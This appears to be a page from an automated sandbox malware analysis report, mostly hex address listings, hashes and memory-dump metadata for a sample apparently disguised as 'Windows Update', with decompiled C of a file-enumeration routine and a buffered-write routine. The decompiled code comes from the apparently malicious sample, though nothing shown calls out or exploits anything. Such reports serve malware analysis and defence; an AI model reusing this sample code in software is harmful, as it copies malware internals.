                                                                                                                    0x0001e311
                                                                                                                    0x0001e318
                                                                                                                    0x0001e52c
                                                                                                                    0x00000000
                                                                                                                    0x0001e31e
                                                                                                                    0x0001e31e
                                                                                                                    0x0001e347
                                                                                                                    0x0001e353
                                                                                                                    0x0001e357
                                                                                                                    0x0001e359
                                                                                                                    0x0001e370
                                                                                                                    0x0001e372
                                                                                                                    0x0001e377
                                                                                                                    0x0001e389
                                                                                                                    0x0001e3a1
                                                                                                                    0x0001e3a4
                                                                                                                    0x0001e3a9
                                                                                                                    0x0001e3a9
                                                                                                                    0x0001e3c3
                                                                                                                    0x0001e3c8
                                                                                                                    0x0001e3c8
                                                                                                                    0x0001e3cb
                                                                                                                    0x0001e3d6
                                                                                                                    0x0001e3db
                                                                                                                    0x00000000
                                                                                                                    0x0001e3e1
                                                                                                                    0x0001e3ed
                                                                                                                    0x0001e3f2
                                                                                                                    0x0001e3f7
                                                                                                                    0x00000000
                                                                                                                    0x0001e3fd
                                                                                                                    0x0001e409
                                                                                                                    0x0001e40e
                                                                                                                    0x0001e413
                                                                                                                    0x0001e421
                                                                                                                    0x0001e426
                                                                                                                    0x0001e429
                                                                                                                    0x0001e429
                                                                                                                    0x0001e439
                                                                                                                    0x0001e448
                                                                                                                    0x0001e44d
                                                                                                                    0x0001e452
                                                                                                                    0x0001e46d
                                                                                                                    0x0001e46d
                                                                                                                    0x0001e47d
                                                                                                                    0x0001e47f
                                                                                                                    0x0001e484
                                                                                                                    0x00000000
                                                                                                                    0x0001e48a
                                                                                                                    0x0001e48a
                                                                                                                    0x0001e497
                                                                                                                    0x0001e49a
                                                                                                                    0x0001e49f
                                                                                                                    0x0001e4aa
                                                                                                                    0x0001e4ac
                                                                                                                    0x0001e4b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001e4c0
                                                                                                                    0x0001e4c3
                                                                                                                    0x0001e4df
                                                                                                                    0x0001e4e4
                                                                                                                    0x0001e4ed
                                                                                                                    0x0001e4ef
                                                                                                                    0x0001e4f4
                                                                                                                    0x00000000
                                                                                                                    0x0001e4f6
                                                                                                                    0x0001e197
                                                                                                                    0x0001e197
                                                                                                                    0x00000000
                                                                                                                    0x0001e197
                                                                                                                    0x00000000
                                                                                                                    0x0001e4f4
                                                                                                                    0x0001e4fb
                                                                                                                    0x0001e503
                                                                                                                    0x0001e51f
                                                                                                                    0x0001e524
                                                                                                                    0x00000000
                                                                                                                    0x0001e524
                                                                                                                    0x0001e454
                                                                                                                    0x0001e45d
                                                                                                                    0x0001e462
                                                                                                                    0x0001e467
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001e467
                                                                                                                    0x0001e452
                                                                                                                    0x0001e3f7
                                                                                                                    0x00000000
                                                                                                                    0x0001e3db
                                                                                                                    0x0001e318
                                                                                                                    0x0001e2b4
                                                                                                                    0x0001e2bb
                                                                                                                    0x00000000
                                                                                                                    0x0001e2bb
                                                                                                                    0x0001e2b2
                                                                                                                    0x0001e27c
                                                                                                                    0x00000000
                                                                                                                    0x0001e1c8
                                                                                                                    0x00000000
                                                                                                                    0x0001e175
                                                                                                                    0x0001e17c
                                                                                                                    0x0001e181
                                                                                                                    0x0001e181
                                                                                                                    0x0001e187
                                                                                                                    0x0001e18d
                                                                                                                    0x0001e192
                                                                                                                    0x0001e192
                                                                                                                    0x00000000
                                                                                                                    0x0001e18d
                                                                                                                    0x0001e173
                                                                                                                    0x0001e14c
                                                                                                                    0x00000000
                                                                                                                    0x0001e138
                                                                                                                    0x00000000
                                                                                                                    0x0001e0df
                                                                                                                    0x0001e0e6
                                                                                                                    0x0001e0eb
                                                                                                                    0x0001e0eb
                                                                                                                    0x0001e0f1
                                                                                                                    0x0001e0f7
                                                                                                                    0x0001e0fc
                                                                                                                    0x0001e0fc
                                                                                                                    0x0001e0ff
                                                                                                                    0x0001e107
                                                                                                                    0x00000000
                                                                                                                    0x0001e10d
                                                                                                                    0x00000000
                                                                                                                    0x0001e10d
                                                                                                                    0x0001e107
                                                                                                                    0x0001e0dd
                                                                                                                    0x00000000
                                                                                                                    0x0001e0bd
                                                                                                                    0x0001e531
                                                                                                                    0x0001e531
                                                                                                                    0x0001e537
                                                                                                                    0x0001e53d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001e53d
                                                                                                                    0x0001e00e
                                                                                                                    0x0001e015
                                                                                                                    0x0001e01b
                                                                                                                    0x0001e021
                                                                                                                    0x0001e027
                                                                                                                    0x0001e02d
                                                                                                                    0x0001e033
                                                                                                                    0x0001e036
                                                                                                                    0x0001e036
                                                                                                                    0x0001e02d
                                                                                                                    0x0001e00c
                                                                                                                    0x0001df98
                                                                                                                    0x0001df98
                                                                                                                    0x0001df9e
                                                                                                                    0x0001df9f
                                                                                                                    0x0001df9f
                                                                                                                    0x0001df7b
                                                                                                                    0x0001df7b
                                                                                                                    0x0001df7b
                                                                                                                    0x0001e543
                                                                                                                    0x0001e543
                                                                                                                    0x0001e549
                                                                                                                    0x0001e552
                                                                                                                    0x0001e557
                                                                                                                    0x0001e557
                                                                                                                    0x0001e55d
                                                                                                                    0x0001e565
                                                                                                                    0x0001e566
                                                                                                                    0x0001e567
                                                                                                                    0x0001e575
                                                                                                                    0x0001dd85
                                                                                                                    0x0001dd85
                                                                                                                    0x0001dd87
                                                                                                                    0x00000000
                                                                                                                    0x0001dd87
                                                                                                                    0x0001dd7f
                                                                                                                    0x0001dd71
                                                                                                                    0x00000000
                                                                                                                    0x0001dec7
                                                                                                                    0x0001dec7
                                                                                                                    0x0001ded5
                                                                                                                    0x0001ded6
                                                                                                                    0x0001dedc
                                                                                                                    0x0001dedd
                                                                                                                    0x0001dedf
                                                                                                                    0x0001dee3
                                                                                                                    0x00000000
                                                                                                                    0x0001dce9
                                                                                                                    0x0001dcdd
                                                                                                                    0x0001dcb9
                                                                                                                    0x0001dc9e
                                                                                                                    0x0001db94
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: /
                                                                                                                    • API String ID: 0-2043925204
                                                                                                                    • Opcode ID: 91da3a7d1fea06831c9ce283baa84c15a02fbe219801259a92efa3d4b56e8cd7
                                                                                                                    • Instruction ID: 22fe14d5946683e8d9d79d2ad66205029501f9e807162c5db706bf7dfe4d7738
                                                                                                                    • Opcode Fuzzy Hash: 91da3a7d1fea06831c9ce283baa84c15a02fbe219801259a92efa3d4b56e8cd7
                                                                                                                    • Instruction Fuzzy Hash: 79D151729002189BDF20DAA0CC89BEA77BDBF44344F0445EAE90DA7141E775AF86CB64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00020957 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 340COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00020957(void* __ebx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v24;
				short _v28;
				intOrPtr _v32;
				char _v40;
				short _v44;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v592;
				char _v10831;
				char _v10832;
				char _v15832;
				char _v26072;
				char _v26076;
				char _v26080;
				void* __edi;
				void* __esi;
				void* _t97;
				void* _t102;
				void* _t108;
				intOrPtr* _t110;
				char _t112;
				void* _t117;
				void* _t121;
				void* _t130;
				intOrPtr _t131;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t153;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr* _t160;
				intOrPtr* _t162;
				intOrPtr* _t163;
				intOrPtr _t166;
				void* _t169;
				intOrPtr _t170;
				void* _t171;
				void* _t174;
				void* _t175;
				void* _t176;
				signed int _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;

				_t166 = __edx;
				_t155 = __ebx;
				E00077307(0x65dc);
				_v8 =  *0x481f80 ^ _t177;
				asm("movq xmm0, [0x47221c]");
				_v16 =  *0x472224;
				_v12 =  *0x472228;
				_v32 =  *0x472234;
				asm("movq [ebp-0x14], xmm0");
				asm("movq xmm0, [0x47222c]");
				_v28 =  *0x472238 & 0x0000ffff;
				_t173 = _a4;
				asm("movq [ebp-0x24], xmm0");
				asm("movq xmm0, [0x47223c]");
				_v48 =  *0x472244;
				asm("movq [ebp-0x34], xmm0");
				asm("movq xmm0, [0x47224c]");
				_v44 =  *0x472248 & 0x0000ffff;
				asm("movq [ebp-0x44], xmm0");
				asm("movq xmm0, [0x472254]");
				_t168 = 3;
				asm("movq [ebp-0x3c], xmm0");
				_v26076 = 3;
				E00077AF9( &_v592, 0x208, _a4);
				E00077B4E( &_v592, 0x208,  &_v72);
				_t179 = _t178 + 0x18;
				_push( &_v592);
				if( *0x47011c() == 0xffffffff) {
					 *0x470124();
					E00077AF9( &_v592, 0x208, _t173);
					E00077B4E( &_v592, 0x208,  &_v56);
					_t97 = L00021127( &_v592);
					_t180 = _t179 + 0x1c;
					if(_t97 != 0) {
						L9:
						_t99 = L00021177( &_v10832, 0x2800);
						_t181 = _t180 + 8;
						if(_t99 != 0) {
							if(_t168 != 1) {
								if(_t168 != 2) {
									goto L26;
								} else {
									_t162 = 0x472260;
									_t136 =  &_v10832;
									while(1) {
										_t166 =  *_t136;
										if(_t166 !=  *_t162) {
											goto L24;
										}
										if(_t166 == 0) {
											goto L23;
										} else {
											_t166 =  *((intOrPtr*)(_t136 + 1));
											if(_t166 !=  *((intOrPtr*)(_t162 + 1))) {
												goto L24;
											} else {
												_t136 = _t136 + 2;
												_t162 = _t162 + 2;
												if(_t166 != 0) {
													continue;
												} else {
													goto L23;
												}
											}
										}
										goto L25;
									}
									goto L24;
								}
							} else {
								_t163 = 0x47225c;
								_t136 =  &_v10832;
								while(1) {
									_t166 =  *_t136;
									if(_t166 !=  *_t163) {
										break;
									}
									if(_t166 == 0) {
										L23:
										_t99 = 0;
									} else {
										_t166 =  *((intOrPtr*)(_t136 + 1));
										if(_t166 !=  *((intOrPtr*)(_t163 + 1))) {
											break;
										} else {
											_t136 = _t136 + 2;
											_t163 = _t163 + 2;
											if(_t166 != 0) {
												continue;
											} else {
												_t99 = 0;
											}
										}
									}
									L25:
									if(_t99 == 0) {
										L26:
										_t102 = L00021177( &_v10832, 0x2800);
										_t182 = _t181 + 8;
										if(_t102 != 0) {
											do {
												_t160 =  &_v10832;
												_t166 = _t160 + 1;
												do {
													_t131 =  *_t160;
													_t160 = _t160 + 1;
												} while (_t131 != 0);
												_t161 = _t160 == _t166;
												if(_t160 == _t166 || _v10832 != 0x2e) {
													goto L31;
												}
												goto L32;
												L31:
												L0001BE37(_t161,  &_v10832);
												_t135 = L00021177( &_v10832, 0x2800);
												_t182 = _t182 + 0xc;
											} while (_t135 != 0);
										}
										L32:
										_t99 = L00021177( &_v10832, 0x2800);
										_t183 = _t182 + 8;
										if(_t99 != 0) {
											_push(_t155);
											do {
												E00077AF9( &_v15832, 0x1388,  &_v10832);
												_t156 = 0;
												_t175 = 0;
												_t108 = L00021177( &_v10832, 0x2800);
												_t184 = _t183 + 0x14;
												if(_t108 != 0) {
													do {
														_t110 =  &_v10832;
														_t166 = _t110 + 1;
														do {
															_t159 =  *_t110;
															_t110 = _t110 + 1;
														} while (_t159 != 0);
														if(_t110 - _t166 < 3) {
															L40:
															_t112 = _v10832;
															if(_t112 == 0x2e) {
																goto L56;
															} else {
																if(_t168 < 2 || _t175 != 2) {
																	if(_t112 != 0x2a) {
																		E00077AF9( &_v26072, 0x2800,  &_v10832);
																		_t117 = L00021177( &_v10832, 0x2800);
																		_t184 = _t184 + 0x14;
																		_t170 = 0;
																	} else {
																		E00077AF9( &_v26072, 0x2800,  &_v10831);
																		_t117 = L00021177( &_v10832, 0x2800);
																		_t184 = _t184 + 0x14;
																		_t170 = 1;
																	}
																	if(_t117 == 0) {
																		goto L56;
																	} else {
																		_v26080 = 0;
																		_t99 = E00020637(_t156, _t166, _t170,  &_v10832,  &_v26080);
																		_t184 = _t184 + 8;
																		if(_t99 == 1) {
																			if(_t170 != 0) {
																				if(_t156 != 0) {
																					_t122 = _v26080;
																					if(_v26080 != 0) {
																						L0001EF07(_a12,  &_v15832, _t156, _t122);
																						_t184 = _t184 + 0x10;
																					}
																				}
																			} else {
																				_t156 = _v26080;
																			}
																			_t168 = _v26076;
																			_t175 = _t175 + 1;
																			goto L55;
																		}
																	}
																} else {
																	_t175 = 0;
																	goto L55;
																}
															}
														} else {
															_t130 = E0007A4C7( &_v10832, 0x472264, 3);
															_t184 = _t184 + 0xc;
															if(_t130 == 0) {
																goto L55;
															} else {
																goto L40;
															}
														}
														goto L57;
														L55:
														_t121 = L00021177( &_v10832, 0x2800);
														_t184 = _t184 + 8;
													} while (_t121 != 0);
												}
												goto L56;
												L56:
												_t99 = L00021177( &_v10832, 0x2800);
												_t168 = _v26076;
												_t183 = _t184 + 8;
											} while (_t99 != 0);
											L57:
											_pop(_t155);
										}
									}
									goto L58;
								}
								L24:
								asm("sbb eax, eax");
								_t99 = _t136 | 0x00000001;
								goto L25;
							}
						}
					} else {
						E00077AF9( &_v592, 0x208, _t173);
						E00077B4E( &_v592, 0x208,  &_v40);
						_t143 = L00021127( &_v592);
						_t180 = _t180 + 0x1c;
						if(_t143 != 0) {
							_t168 = 2;
							goto L8;
						} else {
							E00077AF9( &_v592, 0x208, _t173);
							E00077B4E( &_v592, 0x208,  &_v24);
							_t99 = L00021127( &_v592);
							_t180 = _t180 + 0x1c;
							if(_t99 != 0) {
								_t168 = 1;
								L8:
								_v26076 = _t168;
								goto L9;
							}
						}
					}
					goto L58;
				} else {
					_push(0);
					_push(1);
					_v26076 = 0;
					if(E00027A57( &_v592,  &_v26076) != 0) {
						L58:
						_pop(_t169);
						_pop(_t174);
						return E000772F2(_t99, _t155, _v8 ^ _t177, _t166, _t169, _t174);
					} else {
						E00020797(__ebx, 3, _v26076, _a12);
						_t153 = E00024A77(__ebx, _t173, _v26076);
						_pop(_t171);
						_pop(_t176);
						return E000772F2(_t153, __ebx, _v8 ^ _t177, _t166, _t171, _t176);
					}
				}
			}
























































                                                                                                                    0x00020957
                                                                                                                    0x00020957
                                                                                                                    0x0002095f
                                                                                                                    0x0002096b
                                                                                                                    0x00020973
                                                                                                                    0x0002097b
                                                                                                                    0x00020983
                                                                                                                    0x0002098b
                                                                                                                    0x00020995
                                                                                                                    0x0002099a
                                                                                                                    0x000209a2
                                                                                                                    0x000209ac
                                                                                                                    0x000209af
                                                                                                                    0x000209b4
                                                                                                                    0x000209bc
                                                                                                                    0x000209c7
                                                                                                                    0x000209cc
                                                                                                                    0x000209d5
                                                                                                                    0x000209d9
                                                                                                                    0x000209de
                                                                                                                    0x000209f1
                                                                                                                    0x000209f7
                                                                                                                    0x000209fc
                                                                                                                    0x00020a02
                                                                                                                    0x00020a17
                                                                                                                    0x00020a1c
                                                                                                                    0x00020a25
                                                                                                                    0x00020a2f
                                                                                                                    0x00020a89
                                                                                                                    0x00020a9c
                                                                                                                    0x00020ab1
                                                                                                                    0x00020abd
                                                                                                                    0x00020ac2
                                                                                                                    0x00020ac7
                                                                                                                    0x00020b57
                                                                                                                    0x00020b63
                                                                                                                    0x00020b68
                                                                                                                    0x00020b6d
                                                                                                                    0x00020b76
                                                                                                                    0x00020baa
                                                                                                                    0x00000000
                                                                                                                    0x00020bac
                                                                                                                    0x00020bac
                                                                                                                    0x00020bb1
                                                                                                                    0x00020bb7
                                                                                                                    0x00020bb7
                                                                                                                    0x00020bbb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00020bbf
                                                                                                                    0x00000000
                                                                                                                    0x00020bc1
                                                                                                                    0x00020bc1
                                                                                                                    0x00020bc7
                                                                                                                    0x00000000
                                                                                                                    0x00020bc9
                                                                                                                    0x00020bc9
                                                                                                                    0x00020bcc
                                                                                                                    0x00020bd1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00020bd1
                                                                                                                    0x00020bc7
                                                                                                                    0x00000000
                                                                                                                    0x00020bbf
                                                                                                                    0x00000000
                                                                                                                    0x00020bb7
                                                                                                                    0x00020b78
                                                                                                                    0x00020b78
                                                                                                                    0x00020b7d
                                                                                                                    0x00020b87
                                                                                                                    0x00020b87
                                                                                                                    0x00020b8b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00020b8f
                                                                                                                    0x00020bd3
                                                                                                                    0x00020bd3
                                                                                                                    0x00020b91
                                                                                                                    0x00020b91
                                                                                                                    0x00020b97
                                                                                                                    0x00000000
                                                                                                                    0x00020b99
                                                                                                                    0x00020b99
                                                                                                                    0x00020b9c
                                                                                                                    0x00020ba1
                                                                                                                    0x00000000
                                                                                                                    0x00020ba3
                                                                                                                    0x00020ba3
                                                                                                                    0x00020ba3
                                                                                                                    0x00020ba1
                                                                                                                    0x00020b97
                                                                                                                    0x00020bdc
                                                                                                                    0x00020bde
                                                                                                                    0x00020be4
                                                                                                                    0x00020bf0
                                                                                                                    0x00020bf5
                                                                                                                    0x00020bfa
                                                                                                                    0x00020bfc
                                                                                                                    0x00020bfc
                                                                                                                    0x00020c02
                                                                                                                    0x00020c07
                                                                                                                    0x00020c07
                                                                                                                    0x00020c09
                                                                                                                    0x00020c0a
                                                                                                                    0x00020c0e
                                                                                                                    0x00020c10
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00020c1b
                                                                                                                    0x00020c22
                                                                                                                    0x00020c33
                                                                                                                    0x00020c38
                                                                                                                    0x00020c3b
                                                                                                                    0x00020bfc
                                                                                                                    0x00020c3f
                                                                                                                    0x00020c4b
                                                                                                                    0x00020c50
                                                                                                                    0x00020c55
                                                                                                                    0x00020c5b
                                                                                                                    0x00020c67
                                                                                                                    0x00020c7a
                                                                                                                    0x00020c8b
                                                                                                                    0x00020c8d
                                                                                                                    0x00020c8f
                                                                                                                    0x00020c94
                                                                                                                    0x00020c99
                                                                                                                    0x00020ca7
                                                                                                                    0x00020ca7
                                                                                                                    0x00020cad
                                                                                                                    0x00020cb7
                                                                                                                    0x00020cb7
                                                                                                                    0x00020cb9
                                                                                                                    0x00020cba
                                                                                                                    0x00020cc3
                                                                                                                    0x00020ce3
                                                                                                                    0x00020ce3
                                                                                                                    0x00020ceb
                                                                                                                    0x00000000
                                                                                                                    0x00020cf1
                                                                                                                    0x00020cf4
                                                                                                                    0x00020d04
                                                                                                                    0x00020d4c
                                                                                                                    0x00020d5d
                                                                                                                    0x00020d62
                                                                                                                    0x00020d65
                                                                                                                    0x00020d06
                                                                                                                    0x00020d19
                                                                                                                    0x00020d2a
                                                                                                                    0x00020d2f
                                                                                                                    0x00020d32
                                                                                                                    0x00020d32
                                                                                                                    0x00020d69
                                                                                                                    0x00000000
                                                                                                                    0x00020d6b
                                                                                                                    0x00020d79
                                                                                                                    0x00020d83
                                                                                                                    0x00020d88
                                                                                                                    0x00020d8e
                                                                                                                    0x00020d92
                                                                                                                    0x00020d9e
                                                                                                                    0x00020da0
                                                                                                                    0x00020da8
                                                                                                                    0x00020db6
                                                                                                                    0x00020dbb
                                                                                                                    0x00020dbb
                                                                                                                    0x00020da8
                                                                                                                    0x00020d94
                                                                                                                    0x00020d94
                                                                                                                    0x00020d94
                                                                                                                    0x00020dbe
                                                                                                                    0x00020dc4
                                                                                                                    0x00000000
                                                                                                                    0x00020dc4
                                                                                                                    0x00020d8e
                                                                                                                    0x00020cfb
                                                                                                                    0x00020cfb
                                                                                                                    0x00000000
                                                                                                                    0x00020cfb
                                                                                                                    0x00020cf4
                                                                                                                    0x00020cc5
                                                                                                                    0x00020cd3
                                                                                                                    0x00020cd8
                                                                                                                    0x00020cdd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00020cdd
                                                                                                                    0x00000000
                                                                                                                    0x00020dc5
                                                                                                                    0x00020dd1
                                                                                                                    0x00020dd6
                                                                                                                    0x00020dd9
                                                                                                                    0x00020ca7
                                                                                                                    0x00000000
                                                                                                                    0x00020de1
                                                                                                                    0x00020ded
                                                                                                                    0x00020df2
                                                                                                                    0x00020df8
                                                                                                                    0x00020dfb
                                                                                                                    0x00020e03
                                                                                                                    0x00020e03
                                                                                                                    0x00020e03
                                                                                                                    0x00020c55
                                                                                                                    0x00000000
                                                                                                                    0x00020bde
                                                                                                                    0x00020bd7
                                                                                                                    0x00020bd7
                                                                                                                    0x00020bd9
                                                                                                                    0x00000000
                                                                                                                    0x00020bd9
                                                                                                                    0x00020b76
                                                                                                                    0x00020acd
                                                                                                                    0x00020ada
                                                                                                                    0x00020aef
                                                                                                                    0x00020afb
                                                                                                                    0x00020b00
                                                                                                                    0x00020b05
                                                                                                                    0x00020b4c
                                                                                                                    0x00000000
                                                                                                                    0x00020b07
                                                                                                                    0x00020b14
                                                                                                                    0x00020b29
                                                                                                                    0x00020b35
                                                                                                                    0x00020b3a
                                                                                                                    0x00020b3f
                                                                                                                    0x00020b45
                                                                                                                    0x00020b51
                                                                                                                    0x00020b51
                                                                                                                    0x00000000
                                                                                                                    0x00020b51
                                                                                                                    0x00020b3f
                                                                                                                    0x00020b05
                                                                                                                    0x00000000
                                                                                                                    0x00020a31
                                                                                                                    0x00020a31
                                                                                                                    0x00020a33
                                                                                                                    0x00020a43
                                                                                                                    0x00020a57
                                                                                                                    0x00020e04
                                                                                                                    0x00020e07
                                                                                                                    0x00020e0a
                                                                                                                    0x00020e13
                                                                                                                    0x00020a5d
                                                                                                                    0x00020a66
                                                                                                                    0x00020a71
                                                                                                                    0x00020a79
                                                                                                                    0x00020a7a
                                                                                                                    0x00020a88
                                                                                                                    0x00020a88
                                                                                                                    0x00020a57

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$\"G$`"G
                                                                                                                    • API String ID: 0-3175736270
                                                                                                                    • Opcode ID: ea5b6cb9b53e8957100dbd267d18ea25f6a4621cf534d638f75f67bcf4c0e316
                                                                                                                    • Instruction ID: 5598df0aa0acbc84aefa4d5ff9069f73ec6ab65695cc6b5a2d228135724b0e13
                                                                                                                    • Opcode Fuzzy Hash: ea5b6cb9b53e8957100dbd267d18ea25f6a4621cf534d638f75f67bcf4c0e316
                                                                                                                    • Instruction Fuzzy Hash: 24C18372E0132896CB71DBA4ED49AEEB3BD9F55300F1441E2E90CA3153EB72DA85CB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A25AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: swprintf
                                                                                                                    • String ID: {${
                                                                                                                    • API String ID: 233258989-2446989233
                                                                                                                    • Opcode ID: 4aebc092236c2bb7aa73f4d38c1c5328332c8dcc7ce0079713a8b0d521c8cb53
                                                                                                                    • Instruction ID: d7c6950d22d2da84bd8cfdb2df04fd00f0d4f9ff65b56dfe9b31a3d05184d5bb
                                                                                                                    • Opcode Fuzzy Hash: 4aebc092236c2bb7aa73f4d38c1c5328332c8dcc7ce0079713a8b0d521c8cb53
                                                                                                                    • Instruction Fuzzy Hash: 8E5100B294025EAADB21DB94CD40FFE77BCEF49344F1101B2B608A2441DB71AF859F64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00103A6D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E00103A6D(signed int _a4, signed int _a8, signed int _a12, char _a16) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t50;
				signed int _t53;
				void* _t57;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t79;
				signed int _t84;
				signed int _t87;
				signed int _t93;
				intOrPtr* _t97;
				void* _t98;

				_push(_t72);
				_t73 = _a8;
				if(_t73 == 0) {
					L4:
					_t50 = 0;
					L5:
					return _t50;
				}
				_t70 = _a12;
				if(_t70 == 0) {
					goto L4;
				}
				_t3 =  &_a16; // 0x474b58
				_t97 =  *_t3;
				if(_t97 != 0) {
					__eflags = _a4;
					if(_a4 == 0) {
						goto L3;
					}
					_t53 = _t49 | 0xffffffff;
					__eflags = _t70 - _t53 / _t73;
					if(_t70 > _t53 / _t73) {
						goto L3;
					}
					_t93 = _t73 * _t70;
					__eflags =  *(_t97 + 0xc) & 0x0000010c;
					_t71 = _t93;
					if(( *(_t97 + 0xc) & 0x0000010c) == 0) {
						_t74 = 0x1000;
					} else {
						_t74 =  *(_t97 + 0x18);
					}
					_v8 = _t74;
					__eflags = _t93;
					if(_t93 == 0) {
						L34:
						_t50 = _a12;
						goto L5;
					} else {
						do {
							_t84 =  *(_t97 + 0xc) & 0x00000108;
							__eflags = _t84;
							if(_t84 == 0) {
								L18:
								__eflags = _t71 - _t74;
								if(_t71 < _t74) {
									_t57 = E001010E8( *_a4, _t97);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										L36:
										_t50 = (_t93 - _t71) / _a8;
										goto L5;
									}
									_a4 = _a4 + 1;
									_t74 =  *(_t97 + 0x18);
									_t71 = _t71 - 1;
									_v8 = _t74;
									__eflags = _t74;
									if(_t74 <= 0) {
										_t74 = 1;
										__eflags = 1;
										_v8 = 1;
									}
									goto L33;
								}
								__eflags = _t84;
								if(_t84 == 0) {
									L22:
									_t59 = _t71;
									__eflags = _t74;
									if(_t74 == 0) {
										_v12 = _t71;
									} else {
										_t59 = _t71 - _t59 % _t74;
										_v12 = _t59;
									}
									_push(_t59);
									_push(_a4);
									_push(E00102BC8(_t97));
									_t61 = E001097EF(_t71, _t93, _t97, __eflags);
									_t98 = _t98 + 0xc;
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										L35:
										_t43 = _t97 + 0xc;
										 *_t43 =  *(_t97 + 0xc) | 0x00000020;
										__eflags =  *_t43;
										goto L36;
									} else {
										_t79 = _v12;
										_t87 = _t79;
										__eflags = _t61 - _t79;
										if(_t61 <= _t79) {
											_t87 = _t61;
										}
										_a4 = _a4 + _t87;
										_t71 = _t71 - _t87;
										__eflags = _t61 - _t79;
										if(_t61 < _t79) {
											goto L35;
										} else {
											L29:
											_t74 = _v8;
											goto L33;
										}
									}
								}
								_t62 = L00102F3C(_t97);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L36;
								}
								_t74 = _v8;
								goto L22;
							}
							_t63 =  *(_t97 + 4);
							_v12 = _t63;
							__eflags = _t63;
							if(__eflags == 0) {
								goto L18;
							}
							if(__eflags < 0) {
								goto L35;
							}
							__eflags = _t71 - _t63;
							if(_t71 < _t63) {
								_t63 = _t71;
								_v12 = _t71;
							}
							L000FBECC( *_t97, _a4, _t63);
							_t65 = _v12;
							 *(_t97 + 4) =  *(_t97 + 4) - _t65;
							 *_t97 =  *_t97 + _t65;
							_t98 = _t98 + 0xc;
							_t71 = _t71 - _t65;
							_a4 = _a4 + _t65;
							goto L29;
							L33:
							__eflags = _t71;
						} while (_t71 != 0);
						goto L34;
					}
				}
				L3:
				 *((intOrPtr*)(E00100A4A())) = 0x16;
				E001009DB();
				goto L4;
			}




























                                                                                                                    0x00103a71
                                                                                                                    0x00103a72
                                                                                                                    0x00103a7a
                                                                                                                    0x00103a9a
                                                                                                                    0x00103a9a
                                                                                                                    0x00103a9c
                                                                                                                    0x00103aa0
                                                                                                                    0x00103aa0
                                                                                                                    0x00103a7c
                                                                                                                    0x00103a81
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00103a83
                                                                                                                    0x00103a83
                                                                                                                    0x00103a88
                                                                                                                    0x00103aa1
                                                                                                                    0x00103aa5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00103aa7
                                                                                                                    0x00103aae
